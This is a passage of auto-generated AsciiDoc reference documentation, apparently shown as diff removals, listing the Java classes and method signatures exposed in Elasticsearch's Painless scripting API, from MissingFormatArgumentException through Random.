{java11-javadoc}/java.base/java/util/MissingFormatArgumentException.html#(java.lang.String)[MissingFormatArgumentException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/MissingFormatArgumentException.html#getFormatSpecifier()[getFormatSpecifier]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MissingFormatWidthException]] -==== MissingFormatWidthException -* {java11-javadoc}/java.base/java/util/MissingFormatWidthException.html#(java.lang.String)[MissingFormatWidthException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/MissingFormatWidthException.html#getFormatSpecifier()[getFormatSpecifier]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MissingResourceException]] -==== MissingResourceException -* {java11-javadoc}/java.base/java/util/MissingResourceException.html#(java.lang.String,java.lang.String,java.lang.String)[MissingResourceException](null, null, null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/MissingResourceException.html#getClassName()[getClassName]() -* null {java11-javadoc}/java.base/java/util/MissingResourceException.html#getKey()[getKey]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NavigableMap]] -==== NavigableMap -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#ceilingEntry(java.lang.Object)[ceilingEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#ceilingKey(java.lang.Object)[ceilingKey](def) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* Comparator {java11-javadoc}/java.base/java/util/SortedMap.html#comparator()[comparator]() -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableMap.html#descendingKeySet()[descendingKeySet]() -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#descendingMap()[descendingMap]() -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#firstEntry()[firstEntry]() -* def {java11-javadoc}/java.base/java/util/SortedMap.html#firstKey()[firstKey]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#floorEntry(java.lang.Object)[floorEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#floorKey(java.lang.Object)[floorKey](def) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#headMap(java.lang.Object)[headMap](def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#headMap(java.lang.Object,boolean)[headMap](def, boolean) -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#higherEntry(java.lang.Object)[higherEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#higherKey(java.lang.Object)[higherKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#lastEntry()[lastEntry]() -* def {java11-javadoc}/java.base/java/util/SortedMap.html#lastKey()[lastKey]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#lowerEntry(java.lang.Object)[lowerEntry](def) -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableMap.html#navigableKeySet()[navigableKeySet]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#pollFirstEntry()[pollFirstEntry]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#pollLastEntry()[pollLastEntry]() -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#subMap(java.lang.Object,java.lang.Object)[subMap](def, def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#subMap(java.lang.Object,boolean,java.lang.Object,boolean)[subMap](def, boolean, def, boolean) -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#tailMap(java.lang.Object)[tailMap](def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#tailMap(java.lang.Object,boolean)[tailMap](def, boolean) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-NavigableSet]] -==== NavigableSet -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#ceiling(java.lang.Object)[ceiling](def) -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* Comparator {java11-javadoc}/java.base/java/util/SortedSet.html#comparator()[comparator]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* Iterator {java11-javadoc}/java.base/java/util/NavigableSet.html#descendingIterator()[descendingIterator]() -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#descendingSet()[descendingSet]() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#first()[first]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#floor(java.lang.Object)[floor](def) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#headSet(java.lang.Object)[headSet](def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#headSet(java.lang.Object,boolean)[headSet](def, boolean) -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#higher(java.lang.Object)[higher](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#last()[last]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#lower(java.lang.Object)[lower](def) -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#pollFirst()[pollFirst]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#pollLast()[pollLast]() -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#subSet(java.lang.Object,java.lang.Object)[subSet](def, def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#subSet(java.lang.Object,boolean,java.lang.Object,boolean)[subSet](def, boolean, def, boolean) -* double sum() -* double sum(ToDoubleFunction) -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#tailSet(java.lang.Object)[tailSet](def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#tailSet(java.lang.Object,boolean)[tailSet](def, boolean) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NoSuchElementException]] -==== NoSuchElementException -* {java11-javadoc}/java.base/java/util/NoSuchElementException.html#()[NoSuchElementException]() -* {java11-javadoc}/java.base/java/util/NoSuchElementException.html#(java.lang.String)[NoSuchElementException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Objects]] -==== Objects -* static int {java11-javadoc}/java.base/java/util/Objects.html#compare(java.lang.Object,java.lang.Object,java.util.Comparator)[compare](def, def, Comparator) -* static boolean {java11-javadoc}/java.base/java/util/Objects.html#deepEquals(java.lang.Object,java.lang.Object)[deepEquals](Object, Object) -* static boolean {java11-javadoc}/java.base/java/util/Objects.html#equals(java.lang.Object,java.lang.Object)[equals](Object, Object) -* static int {java11-javadoc}/java.base/java/util/Objects.html#hash(java.lang.Object%5B%5D)[hash](Object[]) -* static int {java11-javadoc}/java.base/java/util/Objects.html#hashCode(java.lang.Object)[hashCode](Object) -* static boolean {java11-javadoc}/java.base/java/util/Objects.html#isNull(java.lang.Object)[isNull](Object) -* static boolean {java11-javadoc}/java.base/java/util/Objects.html#nonNull(java.lang.Object)[nonNull](Object) -* static def {java11-javadoc}/java.base/java/util/Objects.html#requireNonNull(java.lang.Object)[requireNonNull](def) -* static def {java11-javadoc}/java.base/java/util/Objects.html#requireNonNull(java.lang.Object,java.lang.String)[requireNonNull](def, null) -* static null {java11-javadoc}/java.base/java/util/Objects.html#toString(java.lang.Object)[toString](Object) -* static null {java11-javadoc}/java.base/java/util/Objects.html#toString(java.lang.Object,java.lang.String)[toString](Object, null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Observable]] -==== Observable -* {java11-javadoc}/java.base/java/util/Observable.html#()[Observable]() -* void {java11-javadoc}/java.base/java/util/Observable.html#addObserver(java.util.Observer)[addObserver](Observer) -* int {java11-javadoc}/java.base/java/util/Observable.html#countObservers()[countObservers]() -* void {java11-javadoc}/java.base/java/util/Observable.html#deleteObserver(java.util.Observer)[deleteObserver](Observer) -* void {java11-javadoc}/java.base/java/util/Observable.html#deleteObservers()[deleteObservers]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/util/Observable.html#hasChanged()[hasChanged]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/Observable.html#notifyObservers()[notifyObservers]() -* void {java11-javadoc}/java.base/java/util/Observable.html#notifyObservers(java.lang.Object)[notifyObservers](Object) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Observer]] -==== Observer -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* void {java11-javadoc}/java.base/java/util/Observer.html#update(java.util.Observable,java.lang.Object)[update](Observable, Object) - - -[[painless-api-reference-shared-Optional]] -==== Optional -* static Optional {java11-javadoc}/java.base/java/util/Optional.html#empty()[empty]() -* static Optional {java11-javadoc}/java.base/java/util/Optional.html#of(java.lang.Object)[of](def) -* static Optional {java11-javadoc}/java.base/java/util/Optional.html#ofNullable(java.lang.Object)[ofNullable](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Optional {java11-javadoc}/java.base/java/util/Optional.html#filter(java.util.function.Predicate)[filter](Predicate) -* Optional {java11-javadoc}/java.base/java/util/Optional.html#flatMap(java.util.function.Function)[flatMap](Function) -* def {java11-javadoc}/java.base/java/util/Optional.html#get()[get]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/Optional.html#ifPresent(java.util.function.Consumer)[ifPresent](Consumer) -* boolean {java11-javadoc}/java.base/java/util/Optional.html#isPresent()[isPresent]() -* Optional {java11-javadoc}/java.base/java/util/Optional.html#map(java.util.function.Function)[map](Function) -* def {java11-javadoc}/java.base/java/util/Optional.html#orElse(java.lang.Object)[orElse](def) -* def {java11-javadoc}/java.base/java/util/Optional.html#orElseGet(java.util.function.Supplier)[orElseGet](Supplier) -* def {java11-javadoc}/java.base/java/util/Optional.html#orElseThrow(java.util.function.Supplier)[orElseThrow](Supplier) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-OptionalDouble]] -==== OptionalDouble -* static OptionalDouble {java11-javadoc}/java.base/java/util/OptionalDouble.html#empty()[empty]() -* static OptionalDouble {java11-javadoc}/java.base/java/util/OptionalDouble.html#of(double)[of](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double {java11-javadoc}/java.base/java/util/OptionalDouble.html#getAsDouble()[getAsDouble]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/OptionalDouble.html#ifPresent(java.util.function.DoubleConsumer)[ifPresent](DoubleConsumer) -* boolean {java11-javadoc}/java.base/java/util/OptionalDouble.html#isPresent()[isPresent]() -* double {java11-javadoc}/java.base/java/util/OptionalDouble.html#orElse(double)[orElse](double) -* double {java11-javadoc}/java.base/java/util/OptionalDouble.html#orElseGet(java.util.function.DoubleSupplier)[orElseGet](DoubleSupplier) -* double {java11-javadoc}/java.base/java/util/OptionalDouble.html#orElseThrow(java.util.function.Supplier)[orElseThrow](Supplier) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-OptionalInt]] -==== OptionalInt -* static OptionalInt {java11-javadoc}/java.base/java/util/OptionalInt.html#empty()[empty]() -* static OptionalInt {java11-javadoc}/java.base/java/util/OptionalInt.html#of(int)[of](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/OptionalInt.html#getAsInt()[getAsInt]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/OptionalInt.html#ifPresent(java.util.function.IntConsumer)[ifPresent](IntConsumer) -* boolean {java11-javadoc}/java.base/java/util/OptionalInt.html#isPresent()[isPresent]() -* int {java11-javadoc}/java.base/java/util/OptionalInt.html#orElse(int)[orElse](int) -* int {java11-javadoc}/java.base/java/util/OptionalInt.html#orElseGet(java.util.function.IntSupplier)[orElseGet](IntSupplier) -* int {java11-javadoc}/java.base/java/util/OptionalInt.html#orElseThrow(java.util.function.Supplier)[orElseThrow](Supplier) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-OptionalLong]] -==== OptionalLong -* static OptionalLong {java11-javadoc}/java.base/java/util/OptionalLong.html#empty()[empty]() -* static OptionalLong {java11-javadoc}/java.base/java/util/OptionalLong.html#of(long)[of](long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/OptionalLong.html#getAsLong()[getAsLong]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/OptionalLong.html#ifPresent(java.util.function.LongConsumer)[ifPresent](LongConsumer) -* boolean {java11-javadoc}/java.base/java/util/OptionalLong.html#isPresent()[isPresent]() -* long {java11-javadoc}/java.base/java/util/OptionalLong.html#orElse(long)[orElse](long) -* long {java11-javadoc}/java.base/java/util/OptionalLong.html#orElseGet(java.util.function.LongSupplier)[orElseGet](LongSupplier) -* long {java11-javadoc}/java.base/java/util/OptionalLong.html#orElseThrow(java.util.function.Supplier)[orElseThrow](Supplier) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-PrimitiveIterator]] -==== PrimitiveIterator -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/PrimitiveIterator.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Iterator.html#next()[next]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-PrimitiveIterator-OfDouble]] -==== PrimitiveIterator.OfDouble -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/PrimitiveIterator.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Double {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfDouble.html#next()[next]() -* double {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfDouble.html#nextDouble()[nextDouble]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-PrimitiveIterator-OfInt]] -==== PrimitiveIterator.OfInt -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/PrimitiveIterator.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Integer {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfInt.html#next()[next]() -* int {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfInt.html#nextInt()[nextInt]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-PrimitiveIterator-OfLong]] -==== PrimitiveIterator.OfLong -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/PrimitiveIterator.html#forEachRemaining(java.lang.Object)[forEachRemaining](def) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Long {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfLong.html#next()[next]() -* long {java11-javadoc}/java.base/java/util/PrimitiveIterator$OfLong.html#nextLong()[nextLong]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-PriorityQueue]] -==== PriorityQueue -* {java11-javadoc}/java.base/java/util/PriorityQueue.html#()[PriorityQueue]() -* {java11-javadoc}/java.base/java/util/PriorityQueue.html#(java.util.Comparator)[PriorityQueue](Comparator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Queue]] -==== Queue -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Random]] -==== Random -* {java11-javadoc}/java.base/java/util/Random.html#()[Random]() -* {java11-javadoc}/java.base/java/util/Random.html#(long)[Random](long) -* DoubleStream {java11-javadoc}/java.base/java/util/Random.html#doubles(long)[doubles](long) -* DoubleStream {java11-javadoc}/java.base/java/util/Random.html#doubles(long,double,double)[doubles](long, double, double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* IntStream {java11-javadoc}/java.base/java/util/Random.html#ints(long)[ints](long) -* IntStream {java11-javadoc}/java.base/java/util/Random.html#ints(long,int,int)[ints](long, int, int) -* LongStream {java11-javadoc}/java.base/java/util/Random.html#longs(long)[longs](long) -* LongStream {java11-javadoc}/java.base/java/util/Random.html#longs(long,long,long)[longs](long, long, long) -* boolean {java11-javadoc}/java.base/java/util/Random.html#nextBoolean()[nextBoolean]() -* void 